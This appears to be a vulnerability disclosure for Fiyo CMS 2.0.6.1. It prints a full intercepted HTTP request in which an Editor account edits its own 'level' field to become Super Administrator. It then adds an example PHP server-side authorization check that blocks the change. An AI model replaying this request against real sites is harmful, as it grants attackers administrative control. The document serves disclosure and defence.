Fiyo CMS 2.0.6.1 allows a low-privileged user to escalate to Super Administrator by modifying the level parameter
Source download: https://sourceforge.net/projects/fiyo-cms
Environment: PHP 5.5 + MySQL 5.6 + Apache
Log in to the backend and create several users with different privilege levels:
http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/
By default, the user roles correspond to the following level IDs:
Super Administrator = 1
Administrator = 2
Editor = 3
Publisher = 4
Member = 5++
Link for adding a user: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=add
By default the CMS only lets users with Super Administrator or Administrator privileges add new users,
and only Super Administrator, Administrator and Editor (the test, test2 and test3 users respectively) can log in to the backend at all; the Editor (test3) simply has fewer privileges, so the backend UI shows fewer menu items.
This is where the problem lies: the CMS does not properly enforce authorization on the add-user function (?app=user&act=add), so a user with only Editor privileges (test3) can also access http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user
The unauthorized access does not end there: using it, the same user can add (or modify) a user account so that it holds Super Administrator privileges.
Now we use the same missing check to modify test3's own privileges and raise them to Super Administrator.
Intercept the request with Burp Suite:
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.66.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: ts_email=test%40qq.com; ts_autologin=2eezkit3mx1c4cc0g0gggo0s88ssgg0; bdshare_firstime=1489735593845; UM_distinctid=15adb2a0fd992-0ae9f1ca30c3da8-33634647-e1000-15adb2a0fda414; CNZZDATA1670348=cnzz_eid%3D403630419-1489730836-http%253A%252F%252F192.168.66.128%252F%26ntime%3D1489730836; PHPSESSID=t24p47qopuqjccg34quffe0g20
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
applyedit=Next&id=3&z=test3&user=test3&z=test3&x=&password=&kpassword=&email=test3%40admin.com&level=3&name=test3&bio=
In the request body, level=3 is the user's privilege level (Editor); we change it to level=1 (Super Administrator) and submit the request.
After logging out and logging back in, test3 now has Super Administrator privileges.
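The root cause is that the edit handler trusts the caller's role and the submitted level field without a server-side check. The following is an added example of the checks such a handler needs, written for this page and not taken from Fiyo CMS; the function names, the array shape of the actor and target records, and the session/database sources are assumptions.

```php
<?php
// Added example (not Fiyo CMS code): server-side authorization for a user-edit action.
// Level numbering follows this page: 1 = Super Administrator, 2 = Administrator,
// 3 = Editor, 4 = Publisher, 5 and above = Member.
// Assumption: $actor is loaded from the authenticated session and $target from the
// database by id; only $requestedLevel comes from the POST body (the "level" field).

const LEVEL_SUPER_ADMIN = 1;
const LEVEL_ADMIN       = 2;

/** Only Super Administrator and Administrator may use ?app=user at all. */
function canManageUsers(array $actor): bool
{
    return (int)$actor['level'] <= LEVEL_ADMIN;
}

/**
 * Decide whether $actor may set $target's level to $requestedLevel.
 * Returns null when the change is allowed, otherwise the reason it is denied.
 */
function denyReasonForLevelChange(array $actor, array $target, int $requestedLevel): ?string
{
    $actorLevel  = (int)$actor['level'];
    $targetLevel = (int)$target['level'];

    // The check this page shows to be missing: an Editor never reaches the handler.
    if (!canManageUsers($actor)) {
        return 'role may not manage users';
    }
    if ($requestedLevel < LEVEL_SUPER_ADMIN) {
        return 'invalid level';
    }
    // Nobody may grant a level above their own (lower number = more privilege),
    // so an Administrator can never create or promote a Super Administrator.
    if ($requestedLevel < $actorLevel) {
        return 'cannot grant a level above your own';
    }
    // Nor may an actor edit an account that is more privileged than itself.
    if ($targetLevel < $actorLevel) {
        return 'cannot edit a more privileged user';
    }
    // Self-edit keeps the stored level; the submitted field is ignored.
    if ((int)$actor['id'] === (int)$target['id'] && $requestedLevel !== $targetLevel) {
        return 'cannot change your own level';
    }
    return null;
}

// The request captured on this page: the Editor (id 3, level 3) submits level=1 for itself.
$editor = ['id' => 3, 'level' => 3];
var_dump(denyReasonForLevelChange($editor, $editor, 1));
```

With these checks in place the captured request is rejected before any database write, and the level field in the form can no longer be used to change a role the caller is not entitled to grant.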